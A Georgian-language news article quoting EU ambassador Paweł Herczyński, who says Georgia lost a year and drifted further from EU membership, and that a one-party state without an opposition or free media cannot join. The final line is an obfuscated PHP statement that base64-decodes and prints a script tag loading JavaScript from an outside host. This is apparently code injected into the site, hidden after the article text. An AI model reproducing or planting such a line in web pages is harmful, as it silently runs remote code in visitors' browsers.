celsiusi
ავერსი საქკაბელი

 გასული წელი დაკარგეთ... იმის მაგივრად, რომ საქართველო უფრო დაახლოებოდა ევროკავშირს, კიდევ უფრო მეტად დაშორდით, - ამის შესახებ ევროკავშირის ელჩმა, პაველ ჰერჩინსკიმ განაცხადა.

„ჩვენ მივიღეთ ძალიან რთული, თუმცა გაბედული გადაწყვეტილება, მიგვეღეთ ევროკავშირში, საქართველო ევროკავშირის კანდიდატი ქვეყანაა, თუმცა ეს მოხდება მხოლოდ გარკვეული პირობების დაკმაყოფილების შემთხვევაში. სამწუხაროდ, გასული წელი იყო დაკარგული, იმის მაგივრად, რომ საქართველო უფრო დაახლოებოდა ევროკავშირს, დისტანცია კიდევ უფრო მეტად გაიზარდა. და ეს ხდება მაშინ, როცა სხვა ქვეყნებმა, რომლებსაც ასევე სურთ ევროკავშირში გაწევრიანება, დააჩქარეს საჭირო რეფორმები“, - აღნიშნა პაველ ჰერჩინსკიმ.

როგორც მან აღნიშნა, ევროკავშირის 27 წევრი ქვეყნის ლიდერის გადაწყვეტილება, საქართველოსთვის გაწევრიანების პროცესის შეჩერების შესახებ მტკივნეული და დასანანია განსაკუთრებით იმ კონტექსტში, როდესაც სხვა ქვეყნების შემთხვევაში დაჩქარდა მათი გაწევრიანების პროცესი.

„ერთ კვირაში არჩევნები მოდის, ეს თქვენი არჩევანი და გადაწყვეტილებაა თქვენი და თქვენი შვილების მომავლისთვის. თქვენ რასაც გადაწყვეტთ, ჩვენ - ევროკავშირი თქვენს არჩევანს პატივს ვცემთ. ეს არის დიდი განსხვავება ევროპულ კავშირსა და საბჭოთა კავშირს შორის. ჩვენ პატივს ვცემთ თქვენს არჩევანს, მხოლოდ თქვენ უნდა გადაწყვიტოთ თქვენი მომავალი და არავინ სხვამ. მაგრამ გთხოვთ თქვენც პატივი ეცით იმას, რომ ჩვენ ევროკავშირი კონკრეტულ ღირებულებებზეა დაფუძნებული - თავისუფლებაზე, დემოკრატიაზე, კანონის უზენაესობაზე, ადამიანის უფლებებზე - ეს ღირებულებები მოლაპარაკებებს არ ექვემდებარება და თუ თქვენ გადაწყვეტთ, რომ თქვენი ქვეყანა გახდეს ერთი პარტიის სახელმწიფოს, თუ გადაწყვეტთ რომ აკრძალოთ ყველა ოპოზიციური პარტიები და გააგდოთ სამოქალაქო საზოგადოების ორგანიზაციები, თუ დაუშვებთ, რომ საქართველო იყოს ადგილი, სადაც დამოუკიდებელი მედია არაა და თუ გადაწყვეტთ, რომ თითოეული ადამიანის უფლება საქართველოში დაცული არ იქნება, ნება მიბოძეთ გითხრათ, რომ საქართველო ვერ გახდება ევროკავშირის წევრი ქვეყანა, არც დღეს, არც ხვალ და არც 2030-ში“, - განაცხადა ელჩმა.

85
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");